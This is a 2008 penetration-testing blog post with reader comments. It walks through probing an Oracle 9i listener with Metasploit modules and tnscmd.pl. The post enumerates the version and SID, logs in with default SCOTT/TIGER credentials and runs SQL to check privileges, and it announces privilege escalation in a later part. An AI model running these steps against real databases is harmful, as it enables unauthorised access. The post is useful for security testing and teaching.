Sunday, November 16, 2008

Oracle Pwnage with the Metasploit Oracle Modules Part 1


Every so often you come across an open 1521 on a pentest.

1521/tcp open oracle

But what to do? There aren't a ton of what I consider usable Oracle exploits out there, and the ones that are there involve installing a bunch of extra libraries, and we know thats "tough" to do. Thankfully MC has done all the work for us and created the metasploit mixin and modules. **Need help getting the mixin installed? See my file format post.

All the fun is available here: http://metasploit.com/users/mc/

We start with Oracle version enumeration:
http://metasploit.com/users/mc/oracle9i/oracle_version.rb

msf > use auxiliary/scanner/oracle/oracle_version
msf auxiliary(oracle_version) > info

Name: Oracle Version Enumeration
Version: $Revision$

Provided by:
MC

Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target address range or CIDR identifier
RPORT 1521 yes The target port
THREADS 1 yes The number of concurrent threads

Description:
This module simply queries the TNS listner for the Oracle build.

msf auxiliary(oracle_version) > set RHOSTS 192.168.100.25
RHOSTS => 192.168.100.25
msf auxiliary(oracle_version) > run

[*] Host 192.168.100.25 is running: 32-bit Windows: Version 9.2.0.1.0 - Production


Next step is to determine the SID that the Oracle instance is running as:
http://metasploit.com/users/mc/oracle9i/oracle_sid.rb

msf > use auxiliary/scanner/oracle/oracle_sid
msf auxiliary(oracle_sid) > info

Name: Oracle SID Enumeration
Version: $Revision$

Provided by:
MC

Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target address range or CIDR identifier
RPORT 1521 yes The target port
THREADS 1 yes The number of concurrent threads

Description:
This module simply queries the TNS listner for the SID.

msf auxiliary(oracle_sid) > set RHOSTS 192.168.100.25
RHOSTS => 192.168.100.25
msf auxiliary(oracle_sid) > run

[*] Identified SID for 192.168.100.25: UNLUCKYDB
[*] Auxiliary module execution completed
msf auxiliary(oracle_sid) >


Next we use the oracle_sql module to execute SQL queries against the database. This is handy to 1) run SQL queries and 2) check privileges if you've managed to find some working passwords (hint):
http://metasploit.com/users/mc/oracle9i/oracle_sql.rb

msf > use auxiliary/admin/oracle/oracle_sql
msf auxiliary(oracle_sql) > info

Name: Run simple SQL against the Oracle instance
Version: $Revision:$

Provided by:
MC

Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
DBPASS TIGER yes The password to authenticate as.
DBUSER SCOTT yes The username to authenticate as.
RHOST 127.0.0.1 yes The Oracle host.
RPORT 1521 yes The TNS port.
SID DEMO yes The sid to authenticate with.
SQL select * from v$version no The SQL to execute.

Description:
This module will allow for simple sql statements to be execute
against a given oracle instance given the appropriate credentials.


msf auxiliary(oracle_sql) > set RHOST 192.168.100.25
RHOST => 192.168.100.25
msf auxiliary(oracle_sql) > set SID UNLUCKYDB
SID => UNLUCKYDB
msf auxiliary(oracle_sql) > run

[-] ORA-12514: TNS:listener does not currently know of service requested in connect descriptor
[*] Sending SQL...
[-] ORA-12514: TNS:listener does not currently know of service requested in connect descriptor
[-] undefined method `prepare' for #
[-] undefined method `each' for nil:NilClass
[*] Done...
[-] Auxiliary failed: NoMethodError undefined method `disconnect' for #
[-] Call stack:
[-] (eval):48:in `run'
[*] Auxiliary module execution completed


WTF! no FTW on that one. A Google of the error oracle 12514, hints at the Oracle instance not being set up correctly. Lets see if we can get some more info. Using tnscmd.pl (oldie but a goodie) lets see if we get some additional information using the status command:

cg@WPAD:~/evil/db/oracle$ perl tnscmd.pl status -h 192.168.100.25
sending (CONNECT_DATA=(COMMAND=status)) to 192.168.100.25:1521
writing 89 bytes
reading
. .......6.........S. ...........]........(DESCRIPTION=(TMP=)(VSNNUM=153092352)(ERR=0)(ALIAS=LISTENER)
(SECURITY=OFF)(VERSION=TNSLSNR for 32-bit Windows: Version 9.2.0.1.0 - Production)(START_DATE=13-11TB-200809:50:24)(SIDNUM=1)(LOGFILE=e:\oracle\ora92\network\log\listener.log)
(PRMFILE=e:\oracle\ora92\network\admin\listener.ora)(TRACING=off)(UPTIME=32233167)(SNMP=OFF)(PID=1580))
.5........(ENDPOINT=(HANDLER=(HANDLER_MAXLOAD=0)(HANDLER_LOAD=0)(ESTABLISHED=0)(REFUSED=0)
(HANDLER_ID=05ABD43D6CF4-438B-A1A1-14FC7801D431)(PRE=any)(SESSION=NS)(DESCRIPTION=(ADDRESS=(PROTOCOL=tcp)
(HOST=ab1.xxxxx.com)(PORT=1521))))),,(ENDPOINT=(HANDLER=(STA=ready)(HANDLER_MAXLOAD=0)(HANDLER_LOAD=0)
(ESTABLISHED=0)(REFUSED=0)(HANDLER_ID=A06894A90C64-4555-A915-FC8798AA2A9B)(PRE=http)(SESSION=RAW)
(DESCRIPTION=(ADDRESS=(PROTOCOL=tcp)(HOST=ab1.xxxxxx.com)(PORT=8080))(Presentation=HTTP)(Session=RAW)))),,
(ENDPOINT=(HANDLER=(STA=ready)(HANDLER_MAXLOAD=0)(HANDLER_LOAD=0)(ESTABLISHED=0)(REFUSED=0)
(HANDLER_ID=A0BB13DB2389-431A-80F2-D896C275A179)(PRE=FTP)(SESSION=RAW)(DESCRIPTION=(ADDRESS=(PROTOCOL=tcp)
(HOST=ab1.xxxxxx.com)(PORT=2100))(Presentation=FTP)(Session=RAW)))),,(SERVICE=(SERVICE_NAME=UNLUCKYDB.MYPWN)
(INSTANCE=(INSTANCE_NAME=UNLUCKYDB)(NUM=2)(NUMREL=1))),,(SERVICE=(SERVICE_NAME=UNLUCKYXDB.MYPWN)
(INSTANCE=(INSTANCE_NAME=UNLUCKYDB)(NUM=2)(NUMREL=1))),,.........@



Let's try it with the service name; UNLUCKYXDB.MYPWN

msf auxiliary(oracle_sql) > set SID UNLUCKYXDB.MYPWN
SID => UNLUCKYXDB.MYPWN
msf auxiliary(oracle_sql) > run

[*] Sending SQL...
[*] Oracle9i Enterprise Edition Release 9.2.0.1.0 - Production
[*] PL/SQL Release 9.2.0.1.0 - Production
[*] CORE 9.2.0.1.0 Production
[*] TNS for 32-bit Windows: Version 9.2.0.1.0 - Production
[*] NLSRTL Version 9.2.0.1.0 - Production
[*] Done...
[*] Auxiliary module execution completed
msf auxiliary(oracle_sql) >


**Yeah it worked. Now its time to get some more useful info

msf auxiliary(oracle_sql) > set SQL "select * from user_role_privs"
SQL => select * from user_role_privs
msf auxiliary(oracle_sql) > run

[*] Sending SQL...
[*] SCOTT,CONNECT,NO,YES,NO
[*] SCOTT,RESOURCE,NO,YES,NO
[*] Done...
[*] Auxiliary module execution completed


Thats it for part 1, part 2 we'll use some sqli to hopefully bump scott up to DBA and execute some OS commands.

CG

12 comments:

Anonymous said...

Great timing on this post. No kidding, I was going to google up some of this tonight. Looking forward to your part two.

Netxfocus said...

Thx for your article.When testing,I have get some error.
msf > use auxiliary/admin/oracle/oracle_sql
[-] Failed to load module: auxiliary/admin/oracle/oracle_sql

The file is exists.

What's wrong?

Netxfocus said...

Oh,I see.
[*] WARNING! The following modules could not be loaded!

C:/metasploit/modules/auxiliary/admin/oracle/oracle_sql.rb: NameError C:/metasploit/data/msfweb/vendor/rails/activerecord/lib/../../activesupport/lib/active_support/dependencies.rb:493:in `const_missing': uninitialized constant Msf::Exploit::ORACLE

CG said...

@netxfocus you have to load the mixin

http://metasploit.com/users/mc/oracle9i/oracle.rb

see the fileformat post on where to update the exploit.rb file.

@everyone else, thanks! and thank MC for releasing the code

DarkOperator said...

Great post, this is very useful for Oracle 9i and probably against early versions of 10g. Do you know if any work is being done to update the modules to attack Oracle 10g and 11g? like a SID brutefoce tool.

Anonymous said...

I tried to follow instructions from "Metasploit and File Format Bugs" but still doesn't works.

I'm using framework-3.2, ruby1.8.6-p111

./msfconsole :
uninitialized constant Msf::Exploit (NameError)
from /root/framework-3.2/lib/msf/core/exploit.rb:2:in `require'
from /root/framework-3.2/lib/msf/core/exploit.rb:2
from /root/framework-3.2/lib/msf/core.rb:48:in `require'
from /root/framework-3.2/lib/msf/core.rb:48
from /root/framework-3.2/lib/msf/ui/console/driver.rb:1:in `require'
from /root/framework-3.2/lib/msf/ui/console/driver.rb:1
from /root/framework-3.2/lib/msf/ui/console.rb:10:in `require'
from /root/framework-3.2/lib/msf/ui/console.rb:10
from /root/framework-3.2/lib/msf/ui.rb:10:in `require'
from /root/framework-3.2/lib/msf/ui.rb:10
from ./msfconsole:12:in `require'
from ./msfconsole:12

CG said...

well you jacked something up, I have no idea, remove the line(s) you added. do you still get the error?

Anonymous said...

If i remove:
require 'msf/core/exploit/fileformat'

from exploit.rb

i get the following:
/root/framework-3.2/modules/auxiliary/admin/oracle/oracle_sql.rb: NameError /root/framework-3.2/data/msfweb/vendor/rails/activerecord/lib/../../activesupport/lib/active_support/dependencies.rb:493:in `const_missing': uninitialized constant Msf::Exploit::ORACLE

CG said...
This comment has been removed by the author.
CG said...

ok, it should be

require 'msf/core/exploit/oracle'

to use the oracle aux modules

did you put the actual mixin in the folder? you cant call it without putting the mixin in the folder.

http://www.metasploit.com/users/mc/oracle9i/oracle.rb

the fileformat mixin and exploit.rb entry is for the fileformat exploits.

hope that makes sense.

Anonymous said...

It still doesn't works:
fileformat.rb:3: uninitialized constant Msf::Exploit (NameError)
from /root/framework-3.2/lib/msf/core/exploit.rb:2:in `require'
from /root/framework-3.2/lib/msf/core/exploit.rb:2
from /root/framework-3.2/lib/msf/core.rb:48:in `require'
...
...

Here follows step i take from a fresh framework-3.2:

1. put oracle.rb in lib/msf/core/exploit
2. put fileformat.rb in lib/msf/core/exploit
3. added require 'msf/core/exploit
/oracle' to lib/msf/core/exploit.rb adding:

CG said...
This comment has been removed by the author.